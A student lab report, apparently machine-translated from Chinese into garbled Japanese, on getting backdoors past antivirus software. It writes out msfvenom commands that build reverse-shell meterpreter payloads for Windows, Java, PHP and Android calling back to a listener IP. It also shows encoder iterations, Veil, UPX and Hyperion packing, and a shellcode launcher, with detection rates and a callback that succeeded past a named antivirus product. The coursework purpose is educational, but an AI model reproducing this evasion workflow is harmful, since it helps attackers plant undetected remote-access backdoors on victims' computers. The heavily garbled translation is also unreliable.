ディレクトリ
何を練習
タスク1:MSFエンコーダの適切な使用
タスク2:のようなjarファイル生成された他の文書などmsfvenom
ベール:タスク3
タスク4:パッカー
タスク5:使用Cshellcodeはプログラミング
タスクVIを:教室は、他の方法の使用を記載していない
タスク7:組み合わせることを技術の応用は、悪意のあるコードを殺す避けるために、
コンピュータの名前の付いたソフトのバージョンを上のソフトを殺すの場合には、別のコンピュータを使用して測定し、さらに成功するために戻って実行して、殺す:タスク8を
練習
タスク1:MSFエンコーダの適切な使用
- 我々は以前、ここで使用されるいわゆるMSFのエンコーダが研究している
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.64.144 LPORT=5206 -f exe > 20175206_backdoor.exe
バックドア生成20175206_backdoor.exe
IPアドレスがkaliIPあり、
- 生成されたバックドア
- 私たちの360人の警備員(白決定的に)をしてみましょう
- アンチウイルスバックドアのサイトが提供する教師を使用しVirusTotal検出
低レベルのバックドア71分の56を、この殺害率はある意味では、非常に良いですが、これは主にソフトウェアであることを通して見ることができます
- 使用する
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 10 LHOST=192.168.64.144 LPORT=5206 -f exe > 20175206_backdoor10.exe
バックドアを生成するために20175206_backdoor10.exe
、ここで- i 10
それはここ10回コーディングコーディング何回も、です - 結果の第2のプレイヤーが整備されている、見てみましょう
- 事実はコーディング10倍で任意の添えものがないことを証明していると、それは変更することはできません、同じ殺害の割合
長い凝視として研究がAVエンコーダ自体exeファイルを結合する必要があるため、shikata_ga_nai常にそこに復号される(デコーダスタブ)一部であることを理由に、それのこの部分に住んでいます。また、元のテンプレートのように生成された各バックドアソフトウェアが成功したと同じ、AV長い一度殺害として、このテンプレートが記録されるように、同様のコースに、採用されないが、天然の殺害であります変更されたレートがありません。
タスク2:のようなjarファイルを生成し、他の文書などmsfvenom
多くのバックドアは、Java、PHP、アンドロイドバックドアの例を殺害し、ここで、があります。
- Javaは、バックドア
のコード使用してmsfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.64.144 LPORT=5206 x> 20175206_java_backdoor.jar
生成されたJavaのバックドア
ウェブサイトの殺害を使用した:
61分の35の割合を殺害し、効果ははるかに良いのexeファイルの種類よりも、exeファイルは、ケアああの焦点となっているようです。 - PHPバックドア
コード使用してmsfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.64.144 LPORT=5206 x> 20175206_backdoor.php
作成PHPをバックドア
殺すためのサイトを使用して:
怖がって、59分の3の割合を殺し、ほとんどのウイルス対策ソフトウェアの大半は殺害することはできません!これは、PHPのバックドアは、それの敵であることを意味するのでしょうか?360は手配
ので、これは無能の約360 Tucaoでなければならないと言って、GG、360 PHPバックドアと認めて安全を。 - Androidのバックドア
のコード使用してmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.144 LPORT=5206 x> 20175310_backdoor.apk
生成APKバックドアを
ウェブサイトの殺害を使用して:
はなく、PHPファイルとして、より良いexeファイルといくつかの瓶よりも、61分の25の割合を殺す360を殺すには
、危険なアイテム、明確な成功に分類されています! - それをテストした後、その名前のために配置されたが、その後瓶は、最も無能はEXEファイル、EXEファイルも苦しんで迫害は、ああの多くを見つける持っているように見えますが、APKは、その後、PHPのバックドアファイルは、上司の価値があるようです。
タスク3:ベール
- 実際には、多くの友人が、うまく沿って行くために、短期では、プログラムや言語の多くをインストールするためにつまずいインストールベールに発生した問題は、唯一の印象が遅いのIntuitがインストールされていないことを、私は1時間を持っていました真ん中のコースは、インストールが成功したスクリーンショットでした起動に直接与えられ、ショットを忘れます
- 脱税移動ツールを使用します
- バックドアのベールの生成
手順次のコマンドを実行します。use c/meterpreter/rev_tcp.py set LHOST 192.168.64.144和set LPORT 5206,分别设置反弹连接的IP地址和端口号 generate生成文件
- ウェブサイトの殺害が行わ:
- 率70分の43を殺し、それは非常に満足のいくようではありません。
タスク4:パッカー
从技术上壳分为:
压缩壳:减少应用体积,如ASPack,UPX
加密壳:版权保护,反跟踪。如ASProtect,Armadillo
虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
- シェルUPX圧縮
- 一度だけ20175206_backdoor.exeバーコーディングする前に圧縮するには、コマンドを入力し
upx 20175206_backdoor.exe -o 20175206upx.exe
20175206upx.exe生成に
殺害した後のネットワーク:
72分の55の割合を殺害し、圧縮には使用ああもないように見えますか?! - ハイペリオンの暗号化シェル
- 入力し
wine hyperion.exe -v 20175206upx.exe 20175206Hyperion.exe
たネットワークの殺害を:
タスク5:使用Cshellcodeプログラミング
コマンドを使用しmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.144 LPORT=5206 -f c
生成されたシェルコードの
ネットワークが殺害された:
70分の41を、それだけで非常に満足とみなすことができます。
タスク6:教室は、他の方法の使用を記載していません
- お問い合わせの際に、関連する情報および参照の学生がshellcode_launcherを使用することを決定し、ブログ。
- 適切なソフトウェアをダウンロードするためのインターネット
- それはまだ新しいシェルコードで、サフィックスの点に注意してください。生です
- 使用する
.\shellcode_launcher.exe -i 5206.raw
シェルコードを分離して起動するコマンドを - 使用すると、耳を傾け、対応するIPアドレスを入力し、ポート番号msfconsole
ソフトキルはソフトキル、バックドアの成功を殺す避ける正常に起動しませんでした!ファイル情報をゲット!
タスク7:殺害を避けるために、様々な技術の適用を組み合わせて悪質なコードを実装
- I以前に生成されたシェルコードのEXEファイルが暗号化と圧縮処理を使用する360のテストを使用して再度、結果のEXEファイルを組み合わせて、良い結果を発見し、ネットワーク上の殺害にも多くのことを低減しながら、検出されていないました。
タスク八:測定しても、コンピュータの名前の付いたソフトのバージョンを殺す、成功するためのソフトを殺すの場合には、別のコンピュータを使用して、実行バック
でもバックに成功し、ソフトキルテンセントの家政婦、バージョン13.5
実用的な問題
基本的な質問には答え
どのように(1)キルソフトは、悪意のあるコードを検出されますか?
- シグネチャベースの検出:ウイルスシグネチャアコード、アンチウイルスソフトウェアは、このファイルを判断する任意の情報がウイルスに感染している場合、ウイルススキャン情報データベースは、(「ウイルスシグネチャデータベースいわゆる)、比較しました
- ヒューリスティックのマルウェアの検出:それは、ウイルスのようなソフトウェアウイルスや行為のように見える場合は、ウイルスと考えます
- 挙動ベースのマルウェアの検出:ソフトウェアの動作を監視するためのヒューリスティック
(2)何をすべきかを殺すことは自由ですか?
- ように、自分の目的を達成するために悪意のあるソフトウェアを注入するように、アンチウイルスソフトウェアを殺すことがない、いくつかの悪意のあるソフトウェアに対処
何を殺す避けるために(3)基本的な方法?
- 変更署名
- エンコードシェルコードへ
- パッカーズ
- 再コンパイル、実行可能ファイルベースのペイロード
- 変化挙動
- 通信
- リバウンド接続を使用してみてください
- トンネル技術を使用してください
- 暗号化された通信データ
- 動作モード
- RAMベースの操作
- システムの変更を削減
- コードの正常な機能の役割を混同しましょう
- 通信
- 型にはまらない方法
- バックドアとして脆弱なアプリケーションを使用して、書き込み攻撃コードは、MSFの道路をサーブ
- 社会階級の攻撃、AVソフトオフトリックゴールを使用
- 悪意のあるソフトウェアを手作り
実験と経験の概要
- 概要と経験
の実験は、再び本当に近い実際の時間と時間は、バックドアが既に達したことを言って、柔らかいラインが来て殺すとバック最後の実験は、先生が繰り返し言われ、ソフトキルをオフにしてくださいポイントに行くために、それ以外の場合は、バックドアに困難ですバックドアはとても従順で、注射、。そして、この実験は、私たちのソフトキルがとても弱く、実際の高レベルのバックドアに直面する側から、兄弟レベルのタスクを殺す柔らかくなっているようだ、そうではありません、20%未満の検出率も思い出しました私たちは常に、今日のバックドアを警戒しなければならない任意の過失の情報とデータの時代に大きな損失が発生しますが、我々は何のポイントを行うべきではありません見ずに見ることになっていないポイントべきで、このような高いレベルのバックドアを回避しよう注射、我々は我々のウイルスデータベースを更新するための時間を持って、それはソフトキルだ場合でも、より良い何よりも「誰もが、いじめ」が、ソフトを殺すだけで私たちの保険での役割を与えることができ、私たちは本当のバックドアに立ち向かいます切り札は、彼らの行動に拘束され、ない怠慢、不注意ではありません!
質問
- オープンソフトキルは絶対に悪質なコンピュータコードを防ぐことができますか?
もちろん、絶対に悪質なコンピュータコードを防ぐことはできません。サイトの検出実験、我々はソフトキルをオンにし、私たちが言うことができ、検出が困難、バックドア検出率も頻繁にバックドアの一部がまだ優れ隠すために使用されるアンチウイルスソフトウェアの一部には、非常に低いことがわかります悪質なコードを防ぐために、コンピュータでの役割を持っていますが、あなたは絶対に、具体的弱点を殺すためにいくつかのバックドアの顔に、今日のアンチウイルスソフトウェアが実現されないことがないようにしたい場合は無力残っています。